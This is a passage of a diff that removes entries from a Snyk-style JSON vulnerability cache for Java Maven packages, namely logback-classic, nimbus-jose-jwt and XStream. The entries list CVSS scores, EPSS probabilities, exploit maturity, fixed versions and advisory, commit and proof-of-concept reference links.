-            "assigner": "Snyk",
-            "base_score": 5.9,
-            "cvss_version": "4.0",
-            "modified_at": "2025-01-09T15:34:31.015955Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 6.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-01-09T15:34:31.015955Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:H/A:L"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-12-20T13:34:31.3459Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L",
-        "disclosed_at": "2024-12-19T18:31:37Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.44420",
-          "probability": "0.00218"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-8539867",
-        "initially_fixed_in_versions": [
-          "1.3.15",
-          "1.5.13"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-01-09T15:34:31.015955Z",
-        "package_name": "ch.qos.logback:logback-classic",
-        "package_version": "",
-        "published_at": "2024-12-20T13:49:24.484058Z",
-        "references": [
-          {
-            "title": "Additional Information",
-            "url": "https://logback.qos.ch/news.html%231.5.13"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/2cb6d520df7592ef1c3a198f1b5df3c10c93e183"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/b44b940cc7d4839e06e31a7d60dca174b99c1aa5"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.3.15"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMNIMBUSDS-10691768": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,9.37.4)",
-          "[10.0,10.0.2)"
-        ],
-        "created_at": "2025-07-11T08:32:17.510532Z",
-        "credits": [
-          "Johannes Fredén"
-        ],
-        "cvss_base_score": 6.9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.9,
-            "cvss_version": "4.0",
-            "modified_at": "2025-10-01T17:29:15.455637Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:L/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 5.8,
-            "cvss_version": "3.1",
-            "modified_at": "2025-10-01T17:29:15.455637Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L/E:P"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:L/E:P",
-        "disclosed_at": "2025-07-11T02:45:53Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.15606",
-          "probability": "0.00050"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMNIMBUSDS-10691768",
-        "initially_fixed_in_versions": [
-          "9.37.4",
-          "10.0.2"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-10-01T17:29:15.455637Z",
-        "package_name": "com.nimbusds:nimbus-jose-jwt",
-        "package_version": "",
-        "published_at": "2025-07-11T08:32:17.772097Z",
-        "references": [
-          {
-            "title": "Bitbucket Commit",
-            "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/393a96fd858a5a74276158ca9740b67ca9484b4d"
-          },
-          {
-            "title": "Bitbucket Issue",
-            "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/583/stackoverflowerror-due-to-deeply-nested"
-          },
-          {
-            "title": "Bitbucket Issue",
-            "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/593/back-port-cve-2025-53864-fix-to-9x-branch"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/google/gson/commit/1039427ff0100293dd3cf967a53a55282c0fef6b"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMNIMBUSDS-6247633": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,9.37.2)"
-        ],
-        "created_at": "2024-02-15T08:19:31.015305Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:09:44.783803Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-17T01:12:02.864036Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-05T13:38:55.686557Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-        "disclosed_at": "2024-02-11T05:43:17Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.23759",
-          "probability": "0.00078"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-COMNIMBUSDS-6247633",
-        "initially_fixed_in_versions": [
-          "9.37.2"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-11-05T13:38:55.686557Z",
-        "package_name": "com.nimbusds:nimbus-jose-jwt",
-        "package_version": "",
-        "published_at": "2024-02-15T10:01:12.099619Z",
-        "references": [
-          {
-            "title": "Bitbucket Commit",
-            "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/3b3b77e"
-          },
-          {
-            "title": "Bitbucket Issue",
-            "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/526/"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[, 1.4.14)"
-        ],
-        "created_at": "2020-11-16T10:48:32.69059Z",
-        "credits": [
-          "Zhihong Tian",
-          "Hui Lu"
-        ],
-        "cvss_base_score": 8.6,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.6,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:55.287774Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:P/RL:U/RC:R"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:50:51.142749Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:55.565058Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:39.940203Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:P/RL:U/RC:R",
-        "disclosed_at": "2020-11-16T14:02:37Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99788",
-          "probability": "0.93171"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458",
-        "initially_fixed_in_versions": [
-          "1.4.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:04:01.019511Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2020-11-16T10:59:35Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a"
-          },
-          {
-            "title": "PoC",
-            "url": "https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC"
-          },
-          {
-            "title": "XStream advisory",
-            "url": "https://x-stream.github.io/CVE-2020-26217.html"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26217.yaml"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.15)"
-        ],
-        "created_at": "2020-12-16T11:01:31.348811Z",
-        "credits": [
-          "Liaogui Zhong"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:03:54.078291Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 6.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.844109Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:58.079239Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:43.204596Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C",
-        "disclosed_at": "2020-12-16T10:53:35Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99591",
-          "probability": "0.90702"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "PoC in GitHub",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966",
-        "initially_fixed_in_versions": [
-          "1.4.15"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-07-12T05:20:09.392096Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2020-12-16T17:24:55Z",
-        "references": [
-          {
-            "title": "CVE-2020-26259 Details",
-            "url": "https://x-stream.github.io/CVE-2020-26259.html"
-          },
-          {
-            "title": "GitHub Advisory",
-            "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738"
-          },
-          {
-            "title": "PoC in GitHub",
-            "url": "https://github.com/jas502n/CVE-2020-26259"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.15)"
-        ],
-        "created_at": "2020-12-16T11:07:48.518257Z",
-        "credits": [
-          "Liaogui Zhong"
-        ],
-        "cvss_base_score": 6.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:03:54.135949Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.7,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.337729Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.7,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:49.053065Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 4.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:41.844465Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F",
-        "disclosed_at": "2020-12-16T11:01:34Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99833",
-          "probability": "0.93680"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "functional",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967",
-        "initially_fixed_in_versions": [
-          "1.4.15"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:04:01.098022Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2020-12-16T17:24:55Z",
-        "references": [
-          {
-            "title": "Exploit Repo",
-            "url": "https://github.com/Al1ex/CVE-2020-26258"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/6740c04b217aef02d44fba26402b35e0f6f493ce"
-          },
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2020-26258.html"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26258.yaml"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T12:09:53.420253Z",
-        "credits": [
-          "Liaogui Zhong"
-        ],
-        "cvss_base_score": 5.8,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:48.500447Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:52:02.951486Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.461744Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:07.95529Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T11:50:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99398",
-          "probability": "0.87079"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:03:52.70816Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:20.978671Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21345.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21345.yaml"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T12:30:28.51941Z",
-        "credits": [
-          "Liaogui Zhong"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:45.305008Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:44:28.236284Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:55.587066Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 7.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:07.624866Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T12:10:02Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.96236",
-          "probability": "0.28061"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:55.587066Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:21.319113Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21344.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T12:38:22.474553Z",
-        "credits": [
-          "threedr3am"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:56:27.329623Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.276044Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:55.181822Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:11.08519Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H/E:P",
-        "disclosed_at": "2021-03-23T12:31:43Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.42134",
-          "probability": "0.00199"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:55.181822Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:21.767895Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21348.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T12:42:18.446867Z",
-        "credits": [
-          "wh1t3P1g"
-        ],
-        "cvss_base_score": 5.4,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-06-27T16:16:41.057455Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.947889Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:55.184426Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:10.543668Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T12:39:12Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99631",
-          "probability": "0.91268"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
